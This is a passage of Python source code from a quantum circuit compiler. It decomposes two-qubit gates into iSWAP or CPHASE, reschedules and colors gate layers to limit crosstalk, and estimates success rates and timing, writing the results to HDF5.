conf = False for (j, (w,x)) in enumerate(edges): if (not i==j) and ind[j]: if ((u,w) in coupling) or ((u,x) in coupling) or ((v,w) in coupling) or ((v,x) in coupling): ind[i] = False conf = True break if not conf: ind[i] = True for (i, e) in enumerate(edges): if (ind[i]): newedges.append(e) else: leftover.append(e) #if (len(leftover) > 0): # print("=== newedges ===") # print(newedges) # print("--- leftover ---") # print(leftover) # print("===") return newedges, leftover, ind def update_data(freqsdata, gatesdata, qubit_freqs, gates, num_q): freqsdata.append([qubit_freqs[i] for i in range(num_q)]) gatesdata.append([g for g in gates]) return def write_circuit(freqsdata, gatesdata, outf): #print(freqsdata) freq_dset = outf.create_dataset("freqs", data=np.array(freqsdata)) #print(gatesdata) dt = np.dtype([('name', np.string_, 32), ('qargs', np.int_, (2,))]) for (t, gates) in enumerate(gatesdata): grp = outf.create_group("time%d" % t) npdata = np.array([(np.string_(name), qargs) for (name, qargs) in gates], dtype=dt) gate_dset = grp.create_dataset("gates", data=npdata, dtype=dt) print("\nCircuit data written to " + outf.filename + "\n") return def iswap(): return Operator([[1., 0., 0., 0.],[0., 0., -1.j, 0.],[0., -1.j, 0., 0.], [0., 0., 0., 1.]]) def sqrtiswap(): return Operator([[1., 0., 0., 0.],[0., 1./np.sqrt(2), -1.j/np.sqrt(2), 0.],[0., -1.j/np.sqrt(2), 1./np.sqrt(2), 0.], [0., 0., 0., 1.]]) def decompose_layer(layer, decomp): new_qregs = layer.qregs new_cregs = layer.cregs if len(new_qregs) > 1: print("Multiple q registers.") if len(new_cregs) == 0: new_circuit = QuantumCircuit(new_qregs[0]) elif len(new_cregs) == 1: new_circuit = QuantumCircuit(new_qregs[0], new_cregs[0]) else: print("Multiple c registers.") new_circuit = QuantumCircuit(new_qregs[0]) for inst, qargs, cargs in layer.data: #print(inst.name) if (inst.name == 'measure' or inst.name == 'barrier'): new_circuit.data.append((inst, qargs, cargs)) elif (inst.name == 'cx' or inst.name == 'cnot' or inst.label == 'cnot'): if decomp == 'iswap': new_circuit.rz(-np.pi/2, qargs[0]) new_circuit.rx(np.pi/2, qargs[1]) new_circuit.rz(np.pi/2, qargs[1]) new_circuit.unitary(iswap(), [qargs[0], qargs[1]], label='iswap') new_circuit.rx(np.pi/2, qargs[0]) new_circuit.unitary(iswap(), [qargs[0], qargs[1]], label='iswap') new_circuit.rz(np.pi/2, qargs[1]) elif decomp == 'cphase' or decomp == 'mixed': new_circuit.h(qargs[1]) new_circuit.cz(qargs[0],qargs[1]) new_circuit.h(qargs[1]) else: print("Decomposition method %s not recognized. Try iswap or cphase." % decomp) elif (inst.name == 'swap' or inst.label == 'swap'): if decomp == 'iswap' or decomp == 'mixed': new_circuit.unitary(sqrtiswap(), [qargs[0], qargs[1]], label='sqrtiswap') new_circuit.rx(np.pi/2, qargs[0]) new_circuit.rx(np.pi/2, qargs[1]) new_circuit.unitary(sqrtiswap(), [qargs[0], qargs[1]], label='sqrtiswap') new_circuit.rx(-np.pi/2, qargs[1]) new_circuit.rx(-np.pi/2, qargs[0]) new_circuit.ry(np.pi/2, qargs[1]) new_circuit.ry(np.pi/2, qargs[0]) new_circuit.unitary(sqrtiswap(), [qargs[0], qargs[1]], label='sqrtiswap') new_circuit.ry(-np.pi/2, qargs[1]) new_circuit.ry(-np.pi/2, qargs[0]) elif decomp == 'cphase': new_circuit.h(qargs[1]) new_circuit.cz(qargs[0],qargs[1]) new_circuit.h(qargs[1]) new_circuit.h(qargs[0]) new_circuit.cz(qargs[1],qargs[0]) new_circuit.h(qargs[0]) new_circuit.h(qargs[1]) new_circuit.cz(qargs[0],qargs[1]) new_circuit.h(qargs[1]) else: print("Decomposition method %s not recognized." % decomp) elif (inst.name == 'iswap' or inst.label == 'iswap'): new_circuit.unitary(iswap(), [qargs[0], qargs[1]], label='iswap') else: new_circuit.data.append((inst, qargs, cargs)) return get_layer_circuits(new_circuit) def decompose_layer_flexible(layer, G_crosstalk, verbose): new_qregs = layer.qregs new_cregs = layer.cregs if len(new_qregs) > 1: print("Multiple q registers.") if len(new_cregs) == 0: new_circuit = QuantumCircuit(new_qregs[0]) elif len(new_cregs) == 1: new_circuit = QuantumCircuit(new_qregs[0], new_cregs[0]) else: print("Multiple c registers.") new_circuit = QuantumCircuit(new_qregs[0]) to_decompose = [] # all the two qubit gates (q1,q2) in this layer that are also in G_crosstalk.nodes() cnot_gates = [] swap_gates = [] for inst, qargs, cargs in layer.data: if (inst.name == 'measure' or inst.name == 'barrier'): continue if (inst.name == 'cx' or inst.name == 'cnot' or inst.label == 'cnot' or inst.name == 'swap' or inst.label == 'swap'): q1, q2 = qargs[0].index, qargs[1].index if (q1,q2) in G_crosstalk.nodes(): to_decompose.append((q1,q2)) if (inst.name == 'cx' or inst.name == 'cnot' or inst.label == 'cnot'): cnot_gates.append((q1,q2)) else: swap_gates.append((q1,q2)) elif (q2,q1) in G_crosstalk.nodes(): to_decompose.append((q2,q1)) if (inst.name == 'cx' or inst.name == 'cnot' or inst.label == 'cnot'): cnot_gates.append((q1,q2)) else: swap_gates.append((q1,q2)) else: print("Error: 2-qubit gate not a node in G_crosstalk") if verbose == 0: print("to_decompose:",to_decompose) print("CNOT:",cnot_gates) print("SWAP:",swap_gates) decomp_iswap = [] # the gates that will be decomposed with iswap decomp_cphase = [] # the gates that will be decomposed with cphase temp = [] while to_decompose: if to_decompose[-1] in cnot_gates: decomp_cphase.append(to_decompose[-1]) temp.append((to_decompose.pop(),1)) # 0-iswap, 1-cphase else: decomp_iswap.append(to_decompose[-1]) temp.append((to_decompose.pop(),0)) # 0-iswap, 1-cphase while temp: v, d = temp.pop() for n in G_crosstalk[v]: # loop through v's neighbors in G_crosstalk # if we need to decompose v's neighbor if n in to_decompose: to_decompose.remove(n) # if v is decomposed with iswap, decompose n with cphase if d == 0: decomp_cphase.append(n) temp.append((n,1)) # if v is decomposed with cphase, decompose n with iswap else: decomp_iswap.append(n) temp.append((n,0)) if verbose == 0: print("decomp_iswap:",decomp_iswap) print("decomp_cphase:",decomp_cphase) for inst, qargs, cargs in layer.data: if (inst.name == 'measure' or inst.name == 'barrier'): new_circuit.data.append((inst, qargs, cargs)) elif (inst.name == 'cx' or inst.name == 'cnot' or inst.label == 'cnot'): q1, q2 = qargs[0].index, qargs[1].index if (q1,q2) in decomp_iswap or (q2,q1) in decomp_iswap: new_circuit.rz(-np.pi/2, qargs[0]) new_circuit.rx(np.pi/2, qargs[1]) new_circuit.rz(np.pi/2, qargs[1]) new_circuit.unitary(iswap(), [qargs[0], qargs[1]], label='iswap') new_circuit.rx(np.pi/2, qargs[0]) new_circuit.unitary(iswap(), [qargs[0], qargs[1]], label='iswap') new_circuit.rz(np.pi/2, qargs[1]) elif (q1,q2) in decomp_cphase or (q2,q1) in decomp_cphase: new_circuit.h(qargs[1]) new_circuit.cz(qargs[0],qargs[1]) new_circuit.h(qargs[1]) elif (inst.name == 'swap' or inst.label == 'swap'): q1, q2 = qargs[0].index, qargs[1].index if (q1,q2) in decomp_iswap or (q2,q1) in decomp_iswap: new_circuit.unitary(sqrtiswap(), [qargs[0], qargs[1]], label='sqrtiswap') new_circuit.rx(np.pi/2, qargs[0]) new_circuit.rx(np.pi/2, qargs[1]) new_circuit.unitary(sqrtiswap(), [qargs[0], qargs[1]], label='sqrtiswap') new_circuit.rx(-np.pi/2, qargs[1]) new_circuit.rx(-np.pi/2, qargs[0]) new_circuit.ry(np.pi/2, qargs[1]) new_circuit.ry(np.pi/2, qargs[0]) new_circuit.unitary(sqrtiswap(), [qargs[0], qargs[1]], label='sqrtiswap') new_circuit.ry(-np.pi/2, qargs[1]) new_circuit.ry(-np.pi/2, qargs[0]) elif (q1,q2) in decomp_cphase or (q2,q1) in decomp_cphase: new_circuit.h(qargs[1]) new_circuit.cz(qargs[0],qargs[1]) new_circuit.h(qargs[1]) new_circuit.h(qargs[0]) new_circuit.cz(qargs[1],qargs[0]) new_circuit.h(qargs[0]) new_circuit.h(qargs[1]) new_circuit.cz(qargs[0],qargs[1]) new_circuit.h(qargs[1]) elif (inst.name == 'iswap' or inst.label == 'iswap'): new_circuit.unitary(iswap(), [qargs[0], qargs[1]], label='iswap') else: new_circuit.data.append((inst, qargs, cargs)) return get_layer_circuits(new_circuit), len(decomp_iswap), len(decomp_cphase), len(cnot_gates), len(swap_gates) def reschedule_layer(layers, coupling, verbose): if (len(layers) < 1): print("Too few layers for reschedule_layer") sys.exit() new_qregs = layers[0].qregs new_cregs = layers[0].cregs if len(new_qregs) > 1: print("Multiple q registers.") if len(new_cregs) == 0: new_circuit = QuantumCircuit(new_qregs[0]) elif len(new_cregs) == 1: new_circuit = QuantumCircuit(new_qregs[0], new_cregs[0]) else: print("Multiple c registers.") new_circuit = QuantumCircuit(new_qregs[0]) num_layers = len(layers) #print("nl %d" % num_layers) idx = 1 pending_g = [] for g in layers[0].data: pending_g.append(g) while len(pending_g) > 0 or idx < num_layers: #print("idx %d" % idx) #print(coupling) active_q = [] # active qubits in this layer next_pd_g = [] # gates/instructions for inst, qargs, cargs in pending_g: if len(qargs) == 2: # two-qubit gates q1 = qargs[0].index q2 = qargs[1].index #print("Looking: (%d,%d)" % (q1, q2)) #print("Active: ", active_q) conf = False if (q1 in active_q or q2 in active_q): conf = True if not conf: for (n1, n2) in coupling: if (q1 == n1 and n2 in active_q) or (q2 == n1 and n2 in active_q) or (q1 == n2 and n1 in active_q) or (q2 == n2 and n1 in active_q): conf = True if verbose == 0: print("Delay gate (%d, %d) due to crosstalk" % (q1,q2)) break if not conf: active_q.append(q1) active_q.append(q2) new_circuit.data.append((inst, qargs, cargs)) else: next_pd_g.append((inst, qargs, cargs)) elif len(qargs) == 1: # single-qubit gates q1 = qargs[0].index conf = False if (q1 in active_q): conf = True if not conf: active_q.append(q1) new_circuit.data.append((inst, qargs, cargs)) else: next_pd_g.append((inst, qargs, cargs)) else: # Multi-qubit gates; Barrier? numq = len(qargs) conf = False for qii in xrange(numq): qi = qargs[qii].index if (qi in active_q): conf = True if not conf: active_q.append(qi) new_circuit.data.append((inst, qargs, cargs)) else: next_pd_g.append((inst, qargs, cargs)) pending_g = next_pd_g if (len(pending_g) == 0 and idx < num_layers): for g in layers[idx].data: pending_g.append(g) idx += 1 elif (idx < num_layers and not layers[idx].data[0][0].name == 'barrier'): for g in layers[idx].data: pending_g.append(g) idx += 1 new_circuit.barrier(new_qregs[0]) return get_layer_circuits(new_circuit) def tiling_layer(layers, tilings, pattern_offset, verbose): if (len(layers) < 1): print("Too few layers for tiling_layer") sys.exit() new_qregs = layers[0].qregs new_cregs = layers[0].cregs if len(new_qregs) > 1: print("Multiple q registers.") if len(new_cregs) == 0: new_circuit = QuantumCircuit(new_qregs[0]) elif len(new_cregs) == 1: new_circuit = QuantumCircuit(new_qregs[0], new_cregs[0]) else: print("Multiple c registers.") new_circuit = QuantumCircuit(new_qregs[0]) num_layers = len(layers) #print("nl %d" % num_layers) idx = 1 pattern_idx = 0 pending_g = [] patterns = [] for g in layers[0].data: pending_g.append(g) while len(pending_g) > 0 or idx < num_layers: #print("idx %d" % idx) #print(coupling) active_q = [] # active qubits in this layer next_pd_g = [] # gates/instructions two_q_layer = False two_q_tiling_delay = [] # 2q gates delayed due to tiling for inst, qargs, cargs in pending_g: if len(qargs) == 2: # two-qubit gates q1 = qargs[0].index q2 = qargs[1].index #print("Looking: (%d,%d)" % (q1, q2)) #print("Active: ", active_q) conf = False if (q1 in active_q or q2 in active_q): conf = True next_pd_g.append((inst, qargs, cargs)) if (verbose == 0): print("Delay gate (%d, %d)" % (q1,q2)) #for (n1, n2) in coupling: # if (q1 == n1 and n2 in active_q) or (q2 == n1 and n2 in active_q) or (q1 == n2 and n1 in active_q) or (q2 == n2 and n1 in active_q): # conf = True # if verbose==0: # print("Delay gate (%d, %d)" % (q1,q2)) # break if not conf: if (not((q1,q2) in tilings[(pattern_offset+pattern_idx) % 8] or (q2,q1) in tilings[(pattern_offset+pattern_idx) % 8])): conf = True two_q_tiling_delay.append((inst, qargs, cargs)) if verbose==0: print("Delay gate (%d, %d) due to tiling" % (q1,q2)) if not conf: two_q_layer = True active_q.append(q1) active_q.append(q2) new_circuit.data.append((inst, qargs, cargs)) elif len(qargs) == 1: # single-qubit gates q1 = qargs[0].index conf = False if (q1 in active_q): conf = True if (verbose == 0): print("Delay gate %d" % q1) if not conf: active_q.append(q1) new_circuit.data.append((inst, qargs, cargs)) else: next_pd_g.append((inst, qargs, cargs)) else: # Multi-qubit gates; Barrier? numq = len(qargs) conf = False for qii in range(numq): qi = qargs[qii].index if (qi in active_q): conf = True if not conf: active_q.append(qi) new_circuit.data.append((inst, qargs, cargs)) else: next_pd_g.append((inst, qargs, cargs)) if two_q_layer == False and len(two_q_tiling_delay) > 0: two_q_possible = [] for inst, qargs, cargs in two_q_tiling_delay: q1 = qargs[0].index q2 = qargs[1].index if (q1 in active_q or q2 in active_q): next_pd_g.append((inst, qargs, cargs)) else: two_q_possible.append((inst, qargs, cargs)) if len(two_q_possible) > 0: two_q_layer = True inst, qargs, cargs = two_q_possible[0] q1 = qargs[0].index q2 = qargs[1].index if (q1,q2) in tilings[pattern_offset % 8] or (q2,q1) in tilings[pattern_offset % 8]: pattern_idx = 0 elif (q1,q2) in tilings[(pattern_offset+1) % 8] or (q2,q1) in tilings[(pattern_offset+1) % 8]: pattern_idx = 1 elif (q1,q2) in tilings[(pattern_offset+2) % 8] or (q2,q1) in tilings[(pattern_offset+2) % 8]: pattern_idx = 2 elif (q1,q2) in tilings[(pattern_offset+3) % 8] or (q2,q1) in tilings[(pattern_offset+3) % 8]: pattern_idx = 3 elif (q1,q2) in tilings[(pattern_offset+4) % 8] or (q2,q1) in tilings[(pattern_offset+4) % 8]: pattern_idx = 4 elif (q1,q2) in tilings[(pattern_offset+5) % 8] or (q2,q1) in tilings[(pattern_offset+5) % 8]: pattern_idx = 5 elif (q1,q2) in tilings[(pattern_offset+6) % 8] or (q2,q1) in tilings[(pattern_offset+6) % 8]: pattern_idx = 6 elif (q1,q2) in tilings[(pattern_offset+7) % 8] or (q2,q1) in tilings[(pattern_offset+7) % 8]: pattern_idx = 7 for inst, qargs, cargs in two_q_possible: q1 = qargs[0].index q2 = qargs[1].index if (q1,q2) in tilings[(pattern_offset+pattern_idx) % 8] or (q2,q1) in tilings[(pattern_offset+pattern_idx) % 8]: if (q1 in active_q or q2 in active_q): next_pd_g.append((inst, qargs, cargs)) else: new_circuit.data.append((inst, qargs, cargs)) active_q.append(q1) active_q.append(q2) else: next_pd_g.append((inst, qargs, cargs)) pending_g = next_pd_g if (len(pending_g) == 0 and idx < num_layers): for g in layers[idx].data: pending_g.append(g) idx += 1 elif (idx < num_layers and not layers[idx].data[0][0].name == 'barrier'): for g in layers[idx].data: pending_g.append(g) idx += 1 patterns.append((pattern_idx+pattern_offset) % 8) new_circuit.barrier(new_qregs[0]) patterns.append((pattern_idx+pattern_offset) % 8) if (two_q_layer): pattern_idx += 1 return get_layer_circuits(new_circuit), (pattern_offset+pattern_idx) % 8, patterns """ Input: A dictionary with (key, value) = (edge, int color) Return: A dictionary with (key, value) = (edge, int color), such that if a<b then more nodes are colored with a than b """ def relabel_coloring(int_coloring): num_int = len(set(int_coloring.values())) arr = [] # [(color, popularity) for each color] for i in range(num_int): num = len([k for k,v in int_coloring.items() if v == i]) arr.append((i,num)) arr.sort(key=lambda x:x[1]) # sort arr by popularity new_coloring = {} for i in range(num_int): old_color = arr[num_int-i-1][0] # the new color is i # collect the list of nodes with color = old_color temp = [k for k,v in int_coloring.items() if v == old_color] # color them with the new color for k in temp: new_coloring[k] = i return new_coloring def limit_colors(layers, lim_colors, G_crosstalk, verbose): # print("Limit colors:") if len(layers) < 1 and verbose == 0: print("Too few layers for limit_colors") sys.exit() new_qregs = layers[0].qregs new_cregs = layers[0].cregs if len(new_qregs) > 1 and verbose == 0: print("Multiple q registers.") if len(new_cregs) == 0: new_circuit = QuantumCircuit(new_qregs[0]) elif len(new_cregs) == 1: new_circuit = QuantumCircuit(new_qregs[0], new_cregs[0]) else: if verbose == 0: print("Multiple c registers.") new_circuit = QuantumCircuit(new_qregs[0]) num_layers = len(layers) # print("number of layers:",num_layers) idx = 1 pending_g = [] for g in layers[0].data: pending_g.append(g) while len(pending_g) > 0 or idx < num_layers: # print("idx (of the next layer, start with 1):",idx) #print("idx %d" % idx) #print(coupling) next_pd_g = [] # gates/instructions edges = [] for inst, qargs, cargs in pending_g: if len(qargs) == 2: # two-qubit gates q1 = qargs[0].index q2 = qargs[1].index edge = (q1, q2) edges.append(edge) edges.append((q2,q1)) next_pd_g.append((inst, qargs, cargs)) else: # 1-qubit gate new_circuit.data.append((inst, qargs, cargs)) # put the gates in the next layer into pending_g pending_g = [] if (idx < num_layers): for g in layers[idx].data: pending_g.append(g) # if there's at least 1 2-q gate if (len(next_pd_g) > 0): #print(" There are 2-q gates") # color the layer subgraph = nx.subgraph(G_crosstalk, edges) #print(G_crosstalk.nodes()) #print(subgraph.nodes()) int_coloring = nx.coloring.greedy_color(subgraph) #print("int_coloring:") #print(int_coloring) int_coloring = relabel_coloring(int_coloring) num_int = len(set(int_coloring.values())) # the number of colors # if the coloring uses more colors than allowed if num_int > lim_colors: #print(" Layer to be split, num_int:",num_int) # split the layer split = int(num_int/lim_colors) # the number of new layers if num_int%lim_colors != 0: split += 1 #print("number of sublayers:",split) # for all but the last of the new layers for i in range(split-1): # append the gates that belong to the ith sublayer for inst, qargs, cargs in next_pd_g: q1 = qargs[0].index q2 = qargs[1].index try: ic = int_coloring[(q1,q2)] except: ic = int_coloring[(q2,q1)] if ic >= lim_colors*i and ic < lim_colors*(i+1): new_circuit.data.append((inst, qargs, cargs)) new_circuit.barrier(new_qregs[0]) #print("Added sublayer:", i) # obtain the gates in the last sublayer last_layer = [] for inst, qargs, cargs in next_pd_g: q1 = qargs[0].index q2 = qargs[1].index try: ic = int_coloring[(q1,q2)] except: ic = int_coloring[(q2,q1)] if ic >= (split-1)*lim_colors: last_layer.append((inst, qargs, cargs)) #print("Last sublayer obtained, len:",len(last_layer)) # for the last sublayer, we check if it can be combined with the next layer if idx >= num_layers: #print("Already the last layer, just append") for g in last_layer: new_circuit.data.append(g) new_circuit.barrier(new_qregs[0]) else: conf = False #print("check if can be combined with the next layer") active_next = [] # qubits used in the next layer for inst, qargs, cargs in pending_g: q1 = qargs[0].index active_next.append(q1) if len(qargs) == 2: q2 = qargs[1].index active_next.append(q2) #print("active_next:",active_next) for inst, qargs, cargs in last_layer: q1 = qargs[0].index q2 = qargs[1].index if q1 in active_next or q2 in active_next: conf = True break if conf: # the last sublayer cannot be combined with the next layer #print("cannot be combined") for g in last_layer: new_circuit.data.append(g) new_circuit.barrier(new_qregs[0]) else: # the last sublayer can be combined with the next layer #print("can be combined") for g in last_layer: pending_g.append(g) else: # if the layer doesn't need to be split #print(" Layer doesn't need to be split") for inst, qargs, cargs in next_pd_g: new_circuit.data.append((inst, qargs, cargs)) new_circuit.barrier(new_qregs[0]) else: # this layer only has 1-q gates #print(" There aren't 2-q gates") new_circuit.barrier(new_qregs[0]) idx += 1 return get_layer_circuits(new_circuit) def get_iswap_time(edges, qubit_freqs, tau_special): gt = 0.0 # in ns Cqq = CQQ for (q1, q2) in edges: if (q1,q2) in tau_special: c = tau_special[(q1,q2)] elif (q2,q1) in tau_special: c = tau_special[(q2,q1)] else: c = 1.0 # iswap time: pi/2g J = 0.5 * np.sqrt(qubit_freqs[q1] * qubit_freqs[q2]) * Cqq t = c * np.pi/(2 * J) if t > gt: gt = t return gt def get_cphase_time(edges, qubit_freqs, tau_special): gt = 0.0 # in ns Cqq = CQQ alphas = [ALPHA for f in qubit_freqs] #TODO for (q1, q2) in edges: if (q1,q2) in tau_special: c = tau_special[(q1,q2)] elif (q2,q1) in tau_special: c = tau_special[(q2,q1)] else: c = 1.0 # cphase time: pi/sqrt(2)g J = 0.5 * np.sqrt(qubit_freqs[q1] * (qubit_freqs[q2]+alphas[q2])) * Cqq t = c * np.pi/(np.sqrt(2) * J) if t > gt: gt = t return gt def get_max_time(gt, taus): tmax = gt for t in taus.values(): if t > tmax: tmax = t return tmax def success_rate_rand_coloring(device, circuit, scheduler, d, decomp): success_rate = 0.0 avg_success = 0.0 worst_success = 0.0 depth_before = 0 depth_after = 0 total_time = 0.0 max_colors = 0 t_act = [] t_2q = [] return success_rate, avg_success, worst_success, depth_before, depth_after, total_time, max_colors, t_act, t_2q def success_rate_full_coloring(device, circuit, scheduler, d, decomp, outfile, verbose): outf = h5py.File(outfile + ".hdf5", "w") # output data stores the information needed for hamiltonian simulation # Groups: freqs and gates (for each timestep) # Dataset format: [list of freqs for each timestep] # groups of [('gatename',list of qubits)] freqsdata = [] gatesdata = [] width = device.side_length height = device.side_length num_q = width * height omega_max = device.omega_max delta_int = device.delta_int delta_ext= device.delta_ext delta_park = device.delta_park G_connect = get_connectivity_graph(width, height) park_coloring = nx.coloring.greedy_color(G_connect) num_park = len(set(park_coloring.values())) G_crosstalk = get_aug_line_graph(width, height, d) if full_uni: int_coloring = {} for node in G_crosstalk.nodes: int_coloring[node] = 0 else: int_coloring = nx.coloring.greedy_color(G_crosstalk) #print(int_coloring) num_int = len(set(int_coloring.values())) def _build_color_map(): # negative colors for parking, non-negative colors for interaction. step_park = delta_park / num_park step_int = delta_int / num_int colormap = dict() for c in range(num_int): colormap[str(c)] = omega_max - c * step_int for c in range(num_park): colormap[str(-(c+1))]= omega_max - delta_int - delta_ext - c * step_park return colormap color_to_freq = _build_color_map() def _park_freq(c): omg = color_to_freq[str(-(c+1))] return omg + get_flux_noise(omg, sigma)#+np.random.normal(0,sigma) def _int_freq(c): omg = color_to_freq[str(c)] return omg + get_flux_noise(omg, sigma)#+np.random.normal(0,sigma) def _initial_frequency(): freqs = dict() for q in range(width*height): freqs[q] = _park_freq(park_coloring[q]) return freqs t_act = np.zeros(num_q) t_2q = np.zeros(num_q) active_list = [False for i in range(num_q)] success_rate = 1.0 single_qb_err = 0.0015 tot_success = 0.0 tot_cnt = 0 worst_success = 1.0 max_colors = num_int # max number of colors used # Mapping coupling = get_nearest_neighbor_coupling_list(width, height) circ_mapped = get_map_circuit(circuit, coupling) Cqq = CQQ #circuit.draw(output='mpl') # Check scheduler if (scheduler == 'hybrid'): print("Hybrid scheduler to be implemented.") sys.exit(2) else: # scheduler == qiskit or greedy layers = get_layer_circuits(circ_mapped) qubit_freqs = _initial_frequency() alphas = [ALPHA for f in qubit_freqs] #TODO #leftover = [] #left_gates= [] num_layers = len(layers) idx = 0 total_time = 0.0 # in ns total_tcz = 0.0 # total time spent on CZ gates # total number of gates decomposed with iswap and cphase, used only if d=flexible num_iswap = 0 num_cphase = 0 num_cnot = 0 num_swap = 0 #while (idx < num_layers or len(leftover) > 0): for idx in range(num_layers): all_gates = [] layer_circuit = layers[idx] if verbose == 0: print(layer_circuit) print(idx, "-----------------") #print('leftover len: ' + str(len(leftover))) #print('left_gates len: ' + str(len(left_gates))) #decomp_layer = decompose_layer(layer_circuit, decomp) if decomp == 'flexible': if verbose == 0: print("Decompose layer", idx) decomp_layer, temp_iswap, temp_cphase, temp_cnot, temp_swap = decompose_layer_flexible(layer_circuit, G_crosstalk, verbose) num_iswap += temp_iswap num_cphase += temp_cphase num_cnot += temp_cnot num_swap += temp_swap else: decomp_layer = decompose_layer(layer_circuit, decomp) if (scheduler == 'greedy'): resched_layer = reschedule_layer(decomp_layer, coupling, verbose) else: resched_layer = decomp_layer #print("Layers: %d %d" % (len(decomp_layer), len(resched_layer))) for layer in resched_layer: print(layer) edges = [] edges_cphase = [] # if (q1,q2) is in it, then (q2,q1) is also in it edges_iswaps = [] # if (q1,q2) is in it, then (q2,q1) is also in it #edges = [e for e in leftover] #curr_gates = [e for e in left_gates] curr_gates = [] taus = {} # For storing couplings that needed sqrt iswaps gt = 0.0 layer_time = 0.0 # ns barrier = False single_qb_err = 0.0015 single_qb_err_acc = 1.0 for g, qargs, _ in layer.data: #print(g, qargs) #print(g.qasm()) if g.name == "barrier": barrier = True if g.name == "measure": continue if len(qargs) == 1: all_gates.append((g.qasm(),(qargs[0].index, -1))) active_list[qargs[0].index] = True gt = GATETIMES[g.name] if gt > layer_time: layer_time = gt single_qb_err_acc *= 1 - single_qb_err if len(qargs) == 2: q1, q2 = qargs[0].index, qargs[1].index active_list[q1] = True active_list[q2] = True edges.append((q1, q2)) #print((q1,q2)) curr_gates.append((g.qasm(),(q1, q2))) try: ic = int_coloring[(q1,q2)] except: ic = int_coloring[(q2,q1)] f = _int_freq(ic) #print('freq:',f) if (g.name == 'unitary' and g.label == 'iswap'): qubit_freqs[q1] = f qubit_freqs[q2] = f taus[(q1,q2)] = np.pi / (2 * 0.5 * np.sqrt(f*f) * Cqq) edges_iswaps.append((q1,q2)) elif (g.name == 'unitary' and g.label == 'sqrtiswap'): qubit_freqs[q1] = f qubit_freqs[q2] = f #tau_special[(q1,q2)] = 0.5 taus[(q1,q2)] = 0.5 * np.pi / (2 * 0.5 * np.sqrt(f*f) * Cqq) edges_iswaps.append((q1,q2)) elif (g.name == 'cz' or g.label == 'cz'): qubit_freqs[q1] = f qubit_freqs[q2] = f - alphas[q2] # b/c match f1 with f2+alpha taus[(q1,q2)] = np.pi / (np.sqrt(2) * 0.5 * np.sqrt(f*f) * Cqq) # f is interaction freq edges_cphase.append((q1,q2)) else: print("Gate %s(%s) not recognized. Supports iswap, sqrtiswap, cz." % (g.name, g.label)) t_2q[q1] += taus[(q1,q2)] t_2q[q2] += taus[(q1,q2)] success_rate *= single_qb_err_acc #if (scheduler == 'greedy'): # edges, leftover, ind = greedy_reschedule(coupling, edges) # for i in range(len(ind)): # if (ind[i]): # all_gates.append(curr_gates[i]) # else: # left_gates.append(curr_gates[i]) #else: # for i in range(len(curr_gates)): # all_gates.append(curr_gates[i]) for i in range(len(curr_gates)): all_gates.append(curr_gates[i]) #print("all_gates:") #print(all_gates) #print("edges:") #print(edges) #print("leftover:") #print(leftover) #print("qubit_freqs:") #print(qubit_freqs) #err = compute_crosstalk(edges, coupling, qubit_freqs) if barrier: err, swap_err, leak_err = 0.0, 0.0, 0.0 gt = 0.0 else: if decomp == 'iswap': #err, swap_err, leak_err = compute_crosstalk_iswaps(edges, coupling, qubit_freqs, tau_special) #gt = get_iswap_time(edges, qubit_freqs, tau_special) gt = get_max_time(gt, taus) err, swap_err, leak_err = compute_crosstalk_iswaps(edges_iswaps, coupling, qubit_freqs, taus, gt) elif decomp == 'cphase': gt = get_max_time(gt, taus) err, swap_err, leak_err = compute_crosstalk_cphase(edges_iswaps, coupling, qubit_freqs, taus, gt) #err, swap_err, leak_err = compute_crosstalk_cphase(edges, coupling, qubit_freqs, tau_special) #gt = get_cphase_time(edges, qubit_freqs, tau_special) elif decomp == 'flexible' or decomp == 'mixed': gt = get_max_time(gt, taus) err, swap_err, leak_err = compute_crosstalk_flexible(edges_cphase, edges_iswaps, coupling, qubit_freqs, taus, gt) else: print("Decomposition method %s not recognized. Try iswap or cphase." % decomp) gt = 0.0 if gt > layer_time: layer_time = gt for qubit in range(num_q): if active_list[qubit]: t_act[qubit] += layer_time update_data(freqsdata, gatesdata, qubit_freqs, all_gates, num_q) success_rate *= 1 - err if verbose == 0: print("Layer success: %12.10f (swap: %12.10f, leak: %12.10f)" % (1-err, swap_err, leak_err)) print("Layer time:", layer_time) # Reset the frequencies for (q1, q2) in edges: qubit_freqs[q1] = _park_freq(park_coloring[q1]) qubit_freqs[q2] = _park_freq(park_coloring[q2]) if not barrier: tot_success += (1 - err)*single_qb_err_acc tot_cnt += 1 worst_success = min(worst_success, 1 - err) total_time += layer_time #idx += 1 write_circuit(freqsdata, gatesdata, outf) avg_success = tot_success / tot_cnt if decomp=='flexible' and verbose == 0: print("Total number of CNOT gates:", num_cnot) print("Total number of SWAP gates:", num_swap) print("Total number of 2-qubit gates that are decomposed with iSWAP:", num_iswap) if num_iswap+num_cphase > 0: print("Proportion:",num_iswap/(num_iswap+num_cphase)) print("Total number of 2-qubit gates that are decomposed with CPHASE:", num_cphase) if num_iswap+num_cphase > 0: print("Proportion:",num_cphase/(num_iswap+num_cphase)) return success_rate, avg_success, worst_success, idx, tot_cnt, total_time, max_colors, t_act, t_2q def success_rate_layer_coloring(device, circuit, scheduler, d, decomp, outfile, lim_colors, verbose): outf = h5py.File(outfile + ".hdf5", "w") # output data stores the information needed for hamiltonian simulation # Groups: freqs and gates (for each timestep) # Dataset format: [list of freqs for each timestep] # [('gatename',list of qubits)] freqsdata = [] gatesdata = [] width = device.side_length height = device.side_length num_q = width * height omega_max = device.omega_max delta_int = device.delta_int delta_ext= device.delta_ext delta_park = device.delta_park G_connect = get_connectivity_graph(width, height) park_coloring = nx.coloring.greedy_color(G_connect) num_park = len(set(park_coloring.values())) G_crosstalk = get_aug_line_graph(width, height, d) coupling = get_nearest_neighbor_coupling_list(width, height) Cqq = CQQ def _build_park_color_map(): # negative colors for parking, non-negative colors for interaction. step_park = delta_park / num_park #step_int = delta_int / num_int colormap = dict() #for c in range(num_int): # colormap[str(c)] = omega_max - c * step_int for c in range(num_park): colormap[str(-(c+1))]= omega_max - delta_int - delta_ext - c * step_park return colormap def _add_int_color_map(colormap, n_int): step_int = delta_int / n_int for c in range(n_int): colormap[str(c)] = omega_max - c * step_int color_to_freq = _build_park_color_map() def _park_freq(c): omg = color_to_freq[str(-(c+1))]#+np.random.normal(0,sigma) return omg + get_flux_noise(omg, sigma)#+np.random.normal(0,sigma) def _initial_frequency(): freqs = dict() for q in range(width*height): freqs[q] = _park_freq(park_coloring[q]) return freqs circ_mapped = get_map_circuit(circuit, coupling) #circuit.draw(output='mpl') t_act = np.zeros(num_q) t_2q = 